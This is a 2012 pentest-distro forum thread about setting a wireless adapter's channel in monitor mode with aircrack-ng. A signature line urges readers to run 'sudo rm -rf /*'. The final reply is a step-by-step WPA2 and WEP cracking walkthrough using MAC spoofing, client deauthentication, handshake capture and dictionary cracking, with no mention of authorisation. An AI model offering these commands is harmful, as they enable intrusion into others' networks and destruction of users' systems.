« previous next »
Pages: 1   Go Down

Author Topic: channel set  (Read 6454 times)

Disutopia

  • Newbie
  • *
  • Posts: 12
    • View Profile
on: June 10, 2012, 02:24:07 PM
how can I set the channel of a wireless card in monitor mode? I tried with "airmon-ng start wlan1 3" and "iwconfig wlan1 channel 3". But aireplay-ng respond that the card is on channel 1...


evilsocket

  • Full Member
  • ***
  • Posts: 177
    • View Profile
    • http://www.emoticode.net
Reply #1 on: June 10, 2012, 03:47:06 PM
have you tried first

airmon-ng stop wlan1
airmon-ng stop mon0 ( or whatever is the name of your mon interface )

and THEN

airmon-ng start wlan1 3

?


Disutopia

  • Newbie
  • *
  • Posts: 12
    • View Profile
Reply #2 on: June 10, 2012, 04:03:06 PM
certainly!


SaThaRiel

  • Guest
Reply #3 on: June 11, 2012, 07:38:06 PM
Are you running airodump or kismet together with airmon? If yes (especially airodump-ng) you have to bind it to that channel too. Otherwise it will go through all available channels, no matter what channel you defined for airodump.

Hope that helps.


Disutopia

  • Newbie
  • *
  • Posts: 12
    • View Profile
Reply #4 on: June 11, 2012, 08:32:29 PM
No, I'm just using aircrack suite, thank you anyway!


r083rt

  • Guest
Reply #5 on: June 11, 2012, 11:02:53 PM

Disutopia if you are still having problems do


airmon-ng start wlan1

airodump-ng mon0 -c 3


you will see that the monitored interface is scanning channel 3


r083rt
« Last Edit: June 12, 2012, 12:13:06 AM by r083rt »


ZEROF

  • Hero Member
  • *****
  • Posts: 1247
    • View Profile
    • Pen Tester
Reply #6 on: June 12, 2012, 12:22:14 AM
Hi Disutopia,

Sorry i closed topic by mistake, thanks r083rt. Run this in terminal and post output with pastebin.com, and before all, unplug your USB wireless adapter, wait 10 seconds, plug it back in, then run:

Code: [Select]
lsusb
Code: [Select]
sudo lshw -C network
Code: [Select]
iwconfig
Code: [Select]
ifconfig
Thanks !


« Last Edit: June 12, 2012, 11:41:01 AM by ZEROF »


Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*

r083rt

  • Guest
Reply #7 on: June 12, 2012, 01:20:13 AM
Yes thanks ZEROF I should have ask the user to supply this info , as this could be down to an internal or usb adapter firmware or driver problem


** VERY IMPORTANT **

when posting please be specific and supply all info i.e

device { usb , internal }
device { model }

the more info you supply the more accurate the solution will be


Disutopia

  • Newbie
  • *
  • Posts: 12
    • View Profile
Reply #8 on: June 12, 2012, 11:41:05 AM
Alfa network awuso36h, rtl8187 module is installed!

Code: [Select]
sinec@dante-HP-630-Notebook-PC:~$ sudo lsusb
[sudo] password for sinec:
Bus 002 Device 035: ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter
Bus 002 Device 002: ID 8087:0020 Intel Corp. Integrated Rate Matching Hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 005: ID 0cf3:3005 Atheros Communications, Inc.
Bus 001 Device 003: ID 05c8:021e Cheng Uei Precision Industry Co., Ltd (Foxlink)
Bus 001 Device 002: ID 8087:0020 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
sinec@dante-HP-630-Notebook-PC:~$
sinec@dante-HP-630-Notebook-PC:~$
sinec@dante-HP-630-Notebook-PC:~$ sudo lshw -c network
  *-network               
       description: Ethernet interface
       product: RTL8111/8168B PCI Express Gigabit Ethernet controller
       vendor: Realtek Semiconductor Co., Ltd.
       physical id: 0
       bus info: pci@0000:01:00.0
       logical name: eth0
       version: 06
       serial: 9c:8e:99:41:46:e3
       size: 10Mbit/s
       capacity: 1Gbit/s
       width: 64 bits
       clock: 33MHz
       capabilities: pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation
       configuration: autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3LK-NAPI duplex=half firmware=N/A latency=0 link=no multicast=yes port=MII speed=10Mbit/s
       resources: irq:41 ioport:3000(size=256) memory:d0404000-d0404fff memory:d0400000-d0403fff
  *-network
       description: Wireless interface
       product: AR9285 Wireless Network Adapter (PCI-Express)
       vendor: Atheros Communications Inc.
       physical id: 0
       bus info: pci@0000:02:00.0
       logical name: wlan0
       version: 01
       serial: 68:a3:c4:e1:76:ba
       width: 64 bits
       clock: 33MHz
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
       configuration: broadcast=yes driver=ath9k driverversion=3.2.9-030209-generic firmware=N/A ip=192.168.1.67 latency=0 link=yes multicast=yes wireless=IEEE 802.11bgn
       resources: irq:18 memory:d4400000-d440ffff
  *-network
       description: Wireless interface
       physical id: 2
       bus info: usb@2:1.1
       logical name: wlan1
       serial: 00:0f:04:b3:4d:76
       capabilities: ethernet physical wireless
       configuration: broadcast=yes driver=rtl8187 driverversion=3.2.9-030209-generic firmware=N/A link=no multicast=yes wireless=IEEE 802.11bg
sinec@dante-HP-630-Notebook-PC:~$
sinec@dante-HP-630-Notebook-PC:~$
sinec@dante-HP-630-Notebook-PC:~$ sudo iwconfig wlan1
wlan1     IEEE 802.11bg  ESSID:off/any 
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
         
sinec@dante-HP-630-Notebook-PC:~$
sinec@dante-HP-630-Notebook-PC:~$
sinec@dante-HP-630-Notebook-PC:~$ sudo ifconfig wlan1
wlan1     Link encap:Ethernet  HWaddr 00:0f:04:b3:4d:76 
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisioni:0 txqueuelen:1000
          Byte RX:0 (0.0 B)  Byte TX:0 (0.0 B)

sinec@dante-HP-630-Notebook-PC:~$


r083rt

  • Guest
Reply #9 on: June 12, 2012, 12:41:02 PM
you shoud have no problems with the alfa rtl8187 usb its one of the most widely support cards in linux and all pentesting distros

when you do the below

airmon-ng start wlan1
airodump-ng mon0 -c 3

what channel is it on ???


please post image of the terminal with commands and output

thanks

r083rt

« Last Edit: June 12, 2012, 12:43:21 PM by r083rt »


Disutopia

  • Newbie
  • *
  • Posts: 12
    • View Profile
Reply #10 on: June 12, 2012, 02:47:23 PM
I'm not sure what you ask me!

Code: [Select]
sinec@dante-HP-630-Notebook-PC:~$ sudo airmon-ng


Interface Chipset Driver

mon0 RTL8187 rtl8187 - [phy11]
wlan1 RTL8187 rtl8187 - [phy11]
wlan0 Atheros ath9k - [phy0]

sinec@dante-HP-630-Notebook-PC:~$ sudo airmon-ng stop mon0


Interface Chipset Driver

mon0 RTL8187 rtl8187 - [phy11] (removed)
wlan1 RTL8187 rtl8187 - [phy11]
wlan0 Atheros ath9k - [phy0]

sinec@dante-HP-630-Notebook-PC:~$ sudo airmon-ng stop wlan1


Interface Chipset Driver

wlan1 RTL8187 rtl8187 - [phy11]
(monitor mode disabled)
wlan0 Atheros ath9k - [phy0]

sinec@dante-HP-630-Notebook-PC:~$ sudo airmon-ng start wlan1 3


Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
730 avahi-daemon
731 avahi-daemon
839 NetworkManager
982 wpa_supplicant
3831 dhclient
Process with PID 3831 (dhclient) is running on interface wlan0


Interface Chipset Driver

wlan1 RTL8187 rtl8187 - [phy11]
(monitor mode enabled on mon0)
wlan0 Atheros ath9k - [phy0]

sinec@dante-HP-630-Notebook-PC:~$ sudo airmon-ng


Interface Chipset Driver

mon0 RTL8187 rtl8187 - [phy11]
wlan1 RTL8187 rtl8187 - [phy11]
wlan0 Atheros ath9k - [phy0]

sinec@dante-HP-630-Notebook-PC:~$


r083rt

  • Guest
Reply #11 on: June 12, 2012, 03:47:05 PM
Its very straight foward you still are not doing what i asked ???
listen with your eyes not with your ears !


do the following commands :

airmon-ng stop mon0
airmon-ng stop wlan1

airmon-ng start wlan1
airodump-ng mon0 -c 3

make sure you have no other monitored intefaces up i.e mon1
that goes for your internal card as well either unload your device and reload it i.e ifconfig
or turn off your computer pull out the battery say the alphabet backwards, stand up spin around three times
put your battery back it start up your computer and hey presto its out of monitor mode

if you still have trouble press the any key !!!  :P

now what is the output ????????? sorry I cant simplify this anymore its as straight forward as its gets this thread
is like pulling teeth , painful

example



give me a snap shot of the terminal with airodump running
« Last Edit: June 13, 2012, 03:38:17 AM by r083rt »


ltdan

  • Guest
Reply #12 on: June 26, 2012, 04:55:39 AM
Disutopia, good question, the reason it's still channel hopping is because of the general scan of airodump, when you did the "initial target scan" lets say, so, here's what i like to do, btw, i'm using an alfa with the rtl8187 also, nice card, get the 9db antenna for it, really nice   ;)

first if you want you can spoof or not spoof mon0:
ifconfig
airmon-ng start wlan0
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 promisc
ifconfig mon0 up

type ifconfig again to double check it

then do yer general all AP scan:
airodump-ng mon0
at this point yer telling yer mon0 to scan ALL
so after you find the target AP, what i like to do
is hit the space bar, this pauses the scan,
copy paste the target AP info onto text file
then i just ctrl+c out i open a new window
and enter this:
airodump-ng --bssid E0:91:XX:XX:XX:7A -c 6 -w Mikeyz mon0
as ya know this starts things off on the correct channel, writes
the file to root,
then the usual from another window:
aireplay-ng -0 6 -a E0:91:XX:XX:XX:7A -c 40:30:XX:XX:XX:40 mon0
load the cap after yer handshake magically appears with no trouble whatsoever
from the universe, aircrack-ng /root/Mikeyz-01.cap
and since you have the password in your dictionary file
again, the universe is awesome like this during wpa2 craggen:
aircrack-ng -w /root/Listz/Custom-WPA /root/Mikeyz-01.cap

and if yer doin wepz:

airodump-ng mon0
locate wep target
airodump-ng --bssid 00:e0:XX:XX:XX:a3 -c 6 -w Schoolz mon0
aireplay-ng -2 -p 0841  -c 88:XX:XX:XX:80:9d -b 00:e0:XX:XX:XX:a3 mon0
aircrack-ng -b 00:e0:XX:XX:XX:a3 /root/Schoolz-01.cap

i like the -p 0841 instead of the usual
also here's incremental craggen:

sudo john --incremental:Digits --stdout:8 | sudo aircrack-ng -e (networkname) -w /root/Listz/Custom-WPA /root/

and
hammeren with pyrit:
pyrit -r /root/Handshake.cap -i /root/Desktop/wordlist.txt attack_passthrough

welcome to backbox, the best pentest distro and community you'll find
i've been around on backtrack, blackbuntu etc and frankly,
only my opinion, backbox, for whatever reason, i don't know how or why
gets the tools right, especially metasploit, so have some fun with yer alfa  :)








Pages: 1   Go Up
« previous next »